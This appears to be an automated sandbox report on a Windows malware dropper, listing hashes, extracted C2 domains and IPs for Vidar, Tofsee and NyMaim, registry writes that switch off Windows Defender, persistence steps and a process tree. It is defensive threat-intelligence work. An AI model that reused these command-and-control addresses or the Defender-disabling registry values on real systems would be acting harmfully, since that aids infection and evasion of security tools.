amadey | 24dc074176cdd1b4d8159333443508a5a45160f6e1f75b5bd9f5824f2fda51ed

Resubmissions

14-11-2022 12:34

221114-pr4msahf27 10

14-11-2022 09:44

221114-lqklqsge48 10

Analysis

max time kernel
62s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
14-11-2022 09:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe
Size

3.0MB
MD5

70800f0e430d4c9ae411aa87ef26870d
SHA1

ae3108303791bf71f3d8a22a81950f56d064ec60
SHA256

242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499
SHA512

1746b4407479ab721c7df75bce318fc0251154732e988bd92a65a686da20f71cd7f9705e5a37bf939f4aa5bc64a722b8a73465c58517dc254377a28d20ac2c4c
SSDEEP

49152:xcBOPkZVi7iKiF8cUvFyPIbUgwvnJTn13QTNyfk5u4ocZ12EwJ84vLRaBtIl9mTO:xsri7ixZUvFyPIbYvnZnpQocu4xZ1FC3

Malware Config

Extracted

Family

nullmixer

http://sokiran.xyz/

Extracted

Family

vidar

Version

39.6

Botnet

933

https://sslamlssa1.tumblr.com/

Attributes

profile_id
933

Extracted

Family

tofsee

svartalfheim.top

jotunheim.name

Extracted

Family

vidar

Version

55.6

Botnet

1679

https://t.me/seclab_new

https://raw.githubusercontent.com/sebekeloytfu/simple-bash-scripts/master/calculator.sh

Attributes

profile_id
1679

Extracted

Family

nymaim

45.139.105.171

85.31.46.167

Extracted

Family

vidar

Version

55.6

Botnet

937

https://t.me/seclab_new

https://raw.githubusercontent.com/sebekeloytfu/simple-bash-scripts/master/calculator.sh

Attributes

profile_id
937

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Fabookie payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_6.txt	family_fabookie
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_6.exe	family_fabookie

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/424-196-0x0000000000030000-0x0000000000039000-memory.dmp	family_smokeloader
behavioral2/memory/424-213-0x0000000000030000-0x0000000000039000-memory.dmp	family_smokeloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

sonia_5.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	sonia_5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	sonia_5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	sonia_5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	sonia_5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	sonia_5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	sonia_5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	sonia_5.exe

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3504	1348	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	1348	rundll32.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Nirsoft 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3712-208-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/4432-218-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/312-200-0x0000000000A10000-0x0000000000AAD000-memory.dmp	family_vidar
behavioral2/memory/312-204-0x0000000000400000-0x00000000008F2000-memory.dmp	family_vidar
behavioral2/memory/312-222-0x0000000000400000-0x00000000008F2000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\libstdc++-6.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 16 IoCs

Processes:

setup_install.exesonia_1.exesonia_2.exesonia_3.exesonia_4.exesonia_6.exesonia_5.exesonia_1.exejfiag3g_gg.exejfiag3g_gg.exeF4KYT2D9pyVvGr5XelWZLGo1.exe4_adx_dscsz7Pnu_sjEtm2wQ.exeR3362QJxAOCgsCtJ_zOookPt.exeODRVu_IsQnEuXjzJaykvhMtN.exeSMz106EnyQCZB0Gq5tCgFl1c.exeis-FAOEH.tmp

pid	process
4932	setup_install.exe
3300	sonia_1.exe
424	sonia_2.exe
312	sonia_3.exe
1932	sonia_4.exe
4328	sonia_6.exe
5036	sonia_5.exe
1272	sonia_1.exe
3712	jfiag3g_gg.exe
4432	jfiag3g_gg.exe
4044	F4KYT2D9pyVvGr5XelWZLGo1.exe
2708	4_adx_dscsz7Pnu_sjEtm2wQ.exe
3484	R3362QJxAOCgsCtJ_zOookPt.exe
4664	ODRVu_IsQnEuXjzJaykvhMtN.exe
1624	SMz106EnyQCZB0Gq5tCgFl1c.exe
1352	is-FAOEH.tmp

Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

4752 netsh.exe

pid	process
4752	netsh.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral2/memory/3712-205-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/3712-208-0x0000000000400000-0x000000000045B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral2/memory/4432-218-0x0000000000400000-0x0000000000422000-memory.dmp	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Documents\SMz106EnyQCZB0Gq5tCgFl1c.exe	vmprotect
C:\Users\Admin\Documents\SMz106EnyQCZB0Gq5tCgFl1c.exe	vmprotect
behavioral2/memory/1624-250-0x0000000140000000-0x0000000140615000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sonia_5.exeF4KYT2D9pyVvGr5XelWZLGo1.exe242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exesonia_1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	sonia_5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	F4KYT2D9pyVvGr5XelWZLGo1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	sonia_1.exe

Loads dropped DLL 9 IoCs

Processes:

setup_install.exesonia_2.exerundll32.exeis-FAOEH.tmp

pid	process
4932	setup_install.exe
4932	setup_install.exe
4932	setup_install.exe
4932	setup_install.exe
4932	setup_install.exe
4932	setup_install.exe
424	sonia_2.exe
4012	rundll32.exe
1352	is-FAOEH.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1360-282-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-283-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-286-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-290-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-298-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-296-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-300-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-301-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-348-0x0000000000190000-0x0000000000872000-memory.dmp	themida
behavioral2/memory/1360-366-0x0000000000190000-0x0000000000872000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

sonia_6.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	sonia_6.exe

Drops Chrome extension 1 IoCs

Processes:

sonia_5.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmgjkckkemiagmhlnhcnhgpojndojlhm\1.0.1_0\manifest.json	sonia_5.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ipinfo.io
11 ipinfo.io
13 ip-api.com
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

2184 sc.exe
1156 sc.exe
4548 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
16	ipinfo.io
11	ipinfo.io
13	ip-api.com

pid	process
2184	sc.exe
1156	sc.exe
4548	sc.exe

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2664	4932	WerFault.exe	setup_install.exe
1336	4012	WerFault.exe	rundll32.exe
2644	312	WerFault.exe	sonia_3.exe
3820	3484	WerFault.exe	R3362QJxAOCgsCtJ_zOookPt.exe
4456	4200	WerFault.exe	rundll32.exe
456	2416	WerFault.exe	acfqlfuv.exe
3756	2196	WerFault.exe	zPi4cPwR9SzyL2x3v9g768nU.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

sonia_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

752 schtasks.exe
5072 schtasks.exe
3992 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3136 timeout.exe
956 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4320 taskkill.exe
Modifies registry class 1 IoCs

Processes:

F4KYT2D9pyVvGr5XelWZLGo1.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings F4KYT2D9pyVvGr5XelWZLGo1.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 222 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
752	schtasks.exe
5072	schtasks.exe
3992	schtasks.exe

pid	process
3136	timeout.exe
956	timeout.exe

pid	process
4320	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	F4KYT2D9pyVvGr5XelWZLGo1.exe

description	flow	ioc
HTTP User-Agent header	222	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sonia_2.exejfiag3g_gg.exe

pid	process
424	sonia_2.exe
424	sonia_2.exe
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
4432	jfiag3g_gg.exe
4432	jfiag3g_gg.exe
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

sonia_2.exe

pid process

424 sonia_2.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

sonia_4.exe

description	pid	process
Token: SeDebugPrivilege	1932	sonia_4.exe
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exesonia_1.exesonia_6.exerUNdlL32.eXesonia_5.exechrome.exe

description	pid	process	target process
PID 4396 wrote to memory of 4932	4396	242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe	setup_install.exe
PID 4396 wrote to memory of 4932	4396	242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe	setup_install.exe
PID 4396 wrote to memory of 4932	4396	242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe	setup_install.exe
PID 4932 wrote to memory of 4864	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 4864	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 4864	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3724	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3724	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3724	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3808	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3808	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3808	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 1028	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 1028	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 1028	4932	setup_install.exe	cmd.exe
PID 4864 wrote to memory of 3300	4864	cmd.exe	sonia_1.exe
PID 4864 wrote to memory of 3300	4864	cmd.exe	sonia_1.exe
PID 4864 wrote to memory of 3300	4864	cmd.exe	sonia_1.exe
PID 3724 wrote to memory of 424	3724	cmd.exe	sonia_2.exe
PID 3724 wrote to memory of 424	3724	cmd.exe	sonia_2.exe
PID 3724 wrote to memory of 424	3724	cmd.exe	sonia_2.exe
PID 4932 wrote to memory of 3056	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3056	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 3056	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 528	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 528	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 528	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 460	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 460	4932	setup_install.exe	cmd.exe
PID 4932 wrote to memory of 460	4932	setup_install.exe	cmd.exe
PID 3808 wrote to memory of 312	3808	cmd.exe	sonia_3.exe
PID 3808 wrote to memory of 312	3808	cmd.exe	sonia_3.exe
PID 3808 wrote to memory of 312	3808	cmd.exe	sonia_3.exe
PID 1028 wrote to memory of 1932	1028	cmd.exe	sonia_4.exe
PID 1028 wrote to memory of 1932	1028	cmd.exe	sonia_4.exe
PID 3056 wrote to memory of 5036	3056	cmd.exe	sonia_5.exe
PID 3056 wrote to memory of 5036	3056	cmd.exe	sonia_5.exe
PID 3056 wrote to memory of 5036	3056	cmd.exe	sonia_5.exe
PID 528 wrote to memory of 4328	528	cmd.exe	sonia_6.exe
PID 528 wrote to memory of 4328	528	cmd.exe	sonia_6.exe
PID 528 wrote to memory of 4328	528	cmd.exe	sonia_6.exe
PID 3300 wrote to memory of 1272	3300	sonia_1.exe	sonia_1.exe
PID 3300 wrote to memory of 1272	3300	sonia_1.exe	sonia_1.exe
PID 3300 wrote to memory of 1272	3300	sonia_1.exe	sonia_1.exe
PID 4328 wrote to memory of 3712	4328	sonia_6.exe	jfiag3g_gg.exe
PID 4328 wrote to memory of 3712	4328	sonia_6.exe	jfiag3g_gg.exe
PID 4328 wrote to memory of 3712	4328	sonia_6.exe	jfiag3g_gg.exe
PID 3504 wrote to memory of 4012	3504	rUNdlL32.eXe	rundll32.exe
PID 3504 wrote to memory of 4012	3504	rUNdlL32.eXe	rundll32.exe
PID 3504 wrote to memory of 4012	3504	rUNdlL32.eXe	rundll32.exe
PID 4328 wrote to memory of 4432	4328	sonia_6.exe	jfiag3g_gg.exe
PID 4328 wrote to memory of 4432	4328	sonia_6.exe	jfiag3g_gg.exe
PID 4328 wrote to memory of 4432	4328	sonia_6.exe	jfiag3g_gg.exe
PID 5036 wrote to memory of 1308	5036	sonia_5.exe	chrome.exe
PID 5036 wrote to memory of 1308	5036	sonia_5.exe	chrome.exe
PID 1308 wrote to memory of 4412	1308	chrome.exe	chrome.exe
PID 1308 wrote to memory of 4412	1308	chrome.exe	chrome.exe
PID 5036 wrote to memory of 4044	5036	sonia_5.exe	F4KYT2D9pyVvGr5XelWZLGo1.exe
PID 5036 wrote to memory of 4044	5036	sonia_5.exe	F4KYT2D9pyVvGr5XelWZLGo1.exe
PID 5036 wrote to memory of 4044	5036	sonia_5.exe	F4KYT2D9pyVvGr5XelWZLGo1.exe
PID 5036 wrote to memory of 2708	5036	sonia_5.exe	4_adx_dscsz7Pnu_sjEtm2wQ.exe
PID 5036 wrote to memory of 2708	5036	sonia_5.exe	4_adx_dscsz7Pnu_sjEtm2wQ.exe
PID 5036 wrote to memory of 2708	5036	sonia_5.exe	4_adx_dscsz7Pnu_sjEtm2wQ.exe
PID 5036 wrote to memory of 3484	5036	sonia_5.exe	R3362QJxAOCgsCtJ_zOookPt.exe

C:\Users\Admin\AppData\Local\Temp\242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe
"C:\Users\Admin\AppData\Local\Temp\242b050cc122233e783283296a736b689acfb116c68047c52252a012ba322499.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4396

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_2.exe
sonia_2.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_1.exe
sonia_1.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3300

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_1.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_1.exe" -a
5⤵
- Executes dropped EXE
PID:1272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3808

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_3.exe
sonia_3.exe
4⤵
- Executes dropped EXE
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 312 -s 1168
5⤵
- Program crash
PID:2644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_4.exe
sonia_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3056

C:\Users\Admin\AppData\Local\Temp\7zSC21355A6\sonia_5.exe
sonia_5.exe
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Suspicious use of WriteProcessMemory
PID:5036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb82484f50,0x7ffb82484f60,0x7ffb82484f70
6⤵
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1644 /prefetch:2
6⤵
PID:4312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2008 /prefetch:8
6⤵
PID:1704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
6⤵
PID:5092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2632 /prefetch:1
6⤵
PID:3712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8
6⤵
PID:2988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
6⤵
PID:1496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4532 /prefetch:8
6⤵
PID:4232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 /prefetch:8
6⤵
PID:4088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
6⤵
PID:112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4232 /prefetch:8
6⤵
PID:4012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4964 /prefetch:8
6⤵
PID:3520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:8
6⤵
PID:3136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,15814636824610721229,12181869580497900938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8
6⤵
PID:3096

C:\Program Files\Google\Chrome\Application\chrome.exe
